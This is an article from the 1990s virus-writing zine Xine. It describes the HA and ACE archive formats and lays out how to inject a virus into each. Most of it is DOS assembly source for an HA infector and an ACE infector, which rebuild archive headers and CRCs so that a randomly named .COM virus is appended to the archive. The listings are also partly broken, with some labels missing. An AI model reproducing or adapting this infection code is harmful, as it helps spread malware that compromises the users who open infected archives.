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Xine - issue #3 - Phile 111
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Dropping over
Compression alternative format : HA & ACE
By UnknowN MnemomaniaK [iKx]
Introduction to HA
Ha is an a bit old compression format , it was thought to work with
compatibitility from linux to ibm dos , obviously it is not really used , I
have never seen any HA but the archive exists, so I decided to code it into
my infectors series in honor of the Zhengxi virus , then let's see how it
HA Format
The Ha structure is simple like rar structure but has a little difficulty,
Ha archive is fragmented in two zones
The little that has just : db 'HA' Ha mark
dw 0 number of archive
and following this part , there are a lot of archives that all must respect
this header
------ ----------- ---- ----------- ----------------------------------
00 VERCOMP DB 0 compression method & ver need
value: 0 = 'CPY' Stored 2 = 'HSC' compress using a [sic?]
1 = 'ASC' Default compress. 14 = 'DIR' Directory entry
15 = 'SPECIAL' Unknwon (ver 0.99B)
01 COMPRESS HEX 00000000 compressed size
05 ORIG HEX 00000000 original size
09 CRC32 HEX 00000000 Crc32
0D DATEHOUR HEX 00000000 File-time Unix Standard
?? PATHNAME DS ? Pathname
?? SEPARATOR DB 0FF Separator equal to 0FFh
?? FILENAME DS ? Filename
?? SPEC DB 1 Machine spec
Value: 0 = MS DOS
1 = Linux
?? INFO DW 2 Information - Usually File Attributes
The HA file infection is quite simple , you have to verify that the first 2
bytes are equal to HA , increment the word at offset 02h in the file by 1,
read 0Dh bytes , go to the end write it , write No Pathname + Filename ,
write spec and close the file , damn , let's build an algorithm
1ø Read 4 bytes
2ø Verify the 2 first bytes , if <> HA then close file
3ø Inc the word at offset 02h
4ø Read 0Dh
5ø Rebuild the CRC32 & the name , (-> rebuild header)
6ø Go to the end
7ø Write the virus
8ø Close the file
The Asm file are under the ACE infection, if you need code , don't hesitate
Introduction to ACE
ACE format is a quite new format that has basically the same structure than
RAR , ACE is a serious archive build by an independent , some razor warez
issue of razor are know under this file format . Ace compression/
decompression software is quite good looking and you have very soon the
impression that you have to do with professional material.
ACE Format
I'll just detail the format of one header only becoz you just need to drop
it and drop the virus to infect an archive
------ ----------- ---- ----------- ----------------------------------
00 HEADCRC DW 0000 CRC32x of the header(from 04 to 04+w,[02])
02 HEADSIZ DW 0000 Size of the header
04 HEADTYPE DB 0 Header type : 01 equal files
05 HEAD-FLAGS DW 0 Header : 8001h equal no problem flags :]
07 COMPRESS HEX 00000000 Compressed size
0B ORIG HEX 00000000 Original size
0F FILE TIME HEX 00000000 File time
13 FILE ATTRIB HEX 00000000 Considered as a DWORD,but a WORD is Used
17 CRC32x HEX 00000000 CRC32x of the file
18 INFOS HEX 00000000 Unknown ( Unused ? )
1B RESERVED DW 0000 Use a existing one
1F FILENAMESIZ DW 0000 Unknown ( Unused ? )
Ace structure is kinda secret because not too used and not reprogrammed by
a lot of people like rar arj or zip , but by one individual person only
What's the CRC32x ? then it's basically the CRC32 who are applying a second
not. It's because the programmer forgot to put that in his CRC routine
So , I consider that the best solution with ace files is to drop one
header from an existing packet in the archive , then you go to the end,
you rebuild the header , you calculate Header CRC , you drop the header and
1ø Go to the end
2ø Rebuild the header
3ø Write the header
4ø Write the virus
5ø Close tha file
But in the example, I have analysed the complex ACE header structure to get
an existing one header as temporary , let's see how I did that if you are
interested with that
- - - HA Infector ( test it with the appropried name file ) - - - - - - - - -
.model tiny
org 100h
mov ax,3d02h ; open HA file
mov dx,offset name1
int 21h
xchg ax,bx
mov ah,3fh ; read first 256 byte
mov cx,256
mov dx,offset temporary1
int 21h
cmp word ptr [temporary1],'AH' ; test if archive is
jne HA_invalid ; a real ha
inc word ptr [temporary1+2] ; increment
; number of archive
mov al,2
call go ; go to the end
call HA_build ; rebuild an HA header
mov ah,40h
mov dx,offset temporary1+4
int 21h ; write the new header
mov ah,40h
mov cx,fin-start
mov dx,offset start
int 21h ; write the virus
xor ax,ax
call go
mov ah,40h
mov cx,4
mov dx,offset temporary1
int 21h ; write the new 1st
; packet
mov ah,3Eh
int 21h ; close the file
mov bp,offset temporary1+4
mov byte ptr [bp],20h ; set to no compression & version
inc bp
mov word ptr [bp],fin-start ; set 01h = file size
mov word ptr [bp+2],0
add bp,4
mov cx,fin-start
mov word ptr [bp],cx ; set 05h = file size too
mov word ptr [bp+2],0
add bp,4
mov si,offset start
push bp
call crc_calc
pop bp
mov word ptr [bp],cx ; set 09h as CRC32 of the file
mov word ptr [bp+2],dx
add bp,8
mov byte ptr [bp],0 ; set no path name
inc bp
call set_a_name ; set a new name
mov di,bp
add bp,cx
mov si,offset betaname
repz movsb ; copy it
mov cx,bp
sub cx,offset temporary1+1
mov word ptr [bp],0102h ; write machine infos ...
mov byte ptr [bp+2],20h
ret ; return with header size in cx
mov ah,2Ch ; make aleatory a new name
int 21h
and cx,0000111100001111b
and dx,0000111100001111b
add cx,4141h
add dx,4141h
mov word ptr [betaname],cx
mov word ptr [betaname+2],dx
mov word ptr [betaname+4],'C.'
mov word ptr [betaname+6],'MO'
mov word ptr [betaname+8],0
mov cx,9
go: ; File seek
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
push bx
push si cx
call crc_table ; calculate crc table
pop cx si
mov bp,cx
mov cx,0ffffh
mov dx,0ffffh
xor ax,ax
mov bx,ax
xor bl,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,bh
shl bx,1
shl bx,1
xor cx,word ptr [bx+di]
xor dx,word ptr [bx+di+02]
dec bp
jnz Crc_loop
not dx
not cx
pop bx
mov di,offset starttable+1024 ; the buffer table
; remember : It begin by the end
mov bp,255 ; set bp equal 255
; 255 * 4 = 1024
std ; set Direction Flag On
TableHighloop: ; the major loop in the Crc table Calc
mov cx,8 ; set the minus loop to 8
mov dx,bp ; dx = bp , major counter loop
xor ax,ax ; ax = zero
shr ax,1 ; mov one byte of ax at right in bin
rcr dx,1 ; if anything lost , put it on dx
jae anomality ; if above or equal skip encrypt.
xor dx,08320h ; encrypt value by a signature
xor ax,0EDB8h ;
loop TableLowLoop ; make it 8 times
stosw ; write ax
xchg dx,ax
stosw ; not write dx
dec bp ; decrement the counter
jnz TableHighLoop ; repeat it until bp = 0
mov word ptr [di],0 ; last value equal 0
sub di,2
mov word ptr [di],0
cld ; clear direction flag
name1: db 'yeye.ha',0
betaname: db 13 dup (?)
starttable: db 1024 dup (?)
db 2 dup (?)
temporary1: db 256 dup (?)
end start
- - - HA Infector - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - ACE Infector ( test it with the appropried name file )- - - - - - - - -
.model tiny
org 100h
mov ax,3d02h
mov dx,offset name1
int 21h ; open filename
xchg ax,bx
mov ah,3fh
mov cx,4
mov dx,offset temporary1 ; read 4 first bye put it into
int 21h ; temporary
xor cx,cx
mov dx,word ptr [temporary1+2] ; go to offset w,[02h]
add dx,4
xor ax,ax
call gozero
mov ah,3fh
mov cx,256
mov dx,offset temporary1
int 21h ; read 256 bytes
call ace_header ; build a new ace_header
mov al,2
call go
mov ah,40h
mov cx,word ptr [bp+2]
add cx,4
mov dx,offset temporary1
int 21h ; write the header
mov ah,40h
mov cx,fin-start
mov dx,offset start
int 21h ; write the virus
mov ah,3Eh
int 21h ; close the file
mov bp,offset temporary1
mov byte ptr [bp+4],01 ; set no compression
mov word ptr [bp+5],8001h ; no flags
mov word ptr [bp+7],fin-start ; virus as compress & uncpss
mov word ptr [bp+7+2],0 ; size
mov word ptr [bp+0Bh],fin-start
mov word ptr [bp+0Bh+2],0
push bp
mov si,100h
mov cx,fin-start
call crc_calc
pop bp ; calc crc of the virus
not dx ; not ( not (ax)) = ax
not cx
mov word ptr [bp+17h],cx
mov word ptr [bp+17h+2],dx ; save it here
call set_a_name ; create new name without
dec cx ; Zero End
mov word ptr [bp+1Dh+4],cx ; copy file size
mov word ptr [bp+02],cx
add word ptr [bp+02],1Fh ; copy header size (1Fh+cx)
lea di,[bp+1Fh+4]
mov si,offset betaname ;
repz movsb ; copy name
push bp
lea si,[bp+4]
mov cx,word ptr [bp+2]
call crc_calc ; render header CRC
pop bp
not cx
mov word ptr [bp],cx
set_a_name: ; set a new name
mov ah,2Ch
int 21h
and cx,0000111100001111b
and dx,0000111100001111b
add cx,4141h
add dx,4141h
mov word ptr [betaname],cx
mov word ptr [betaname+2],dx
mov word ptr [betaname+4],'C.'
mov word ptr [betaname+6],'MO'
mov word ptr [betaname+8],0
mov cx,9
xor cx,cx
xor dx,dx
mov ah,42h
int 21h
push bx
push si cx
call crc_table ; calculate crc table
pop cx si
mov bp,cx
mov cx,0ffffh
mov dx,0ffffh
xor ax,ax
mov bx,ax
xor bl,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,bh
shl bx,1
shl bx,1
xor cx,word ptr [bx+di]
xor dx,word ptr [bx+di+02]
dec bp
jnz Crc_loop
not dx
not cx
pop bx
mov di,offset starttable+1024-2 ; the buffer table
; remember : It begin by the end
mov bp,255 ; set bp equal 255
; 255 * 4 = 1024
std ; set Direction Flag On
TableHighloop: ; the major loop in the Crc table Calc
mov cx,8 ; set the minus loop to 8
mov dx,bp ; dx = bp , major counter loop
xor ax,ax ; ax = zero
shr ax,1 ; mov one byte of ax at right in bin
rcr dx,1 ; if anything losted , put it on dx
jae anomality ; if above or equal skip encrypt.
xor dx,08320h ; encrypt value by a signature
xor ax,0EDB8h ;
loop TableLowLoop ; make it 8 times
stosw ; write ax
xchg dx,ax
stosw ; not write dx
dec bp ; decrement the counter
jnz TableHighLoop ; repeat it until bp = 0
mov word ptr [di],0 ; last value equal 0
sub di,2
mov word ptr [di],0
cld ; clear direction flag
name1: db 'yeye.ace',0
betaname: db 13 dup (?)
starttable: db 1024 dup (?)
db 2 dup (?)
temporary1: db 256 dup (?)
end start
- - - ACE Infector - - - - - - - - - - - - - - - - - - - - - - - - - - - - -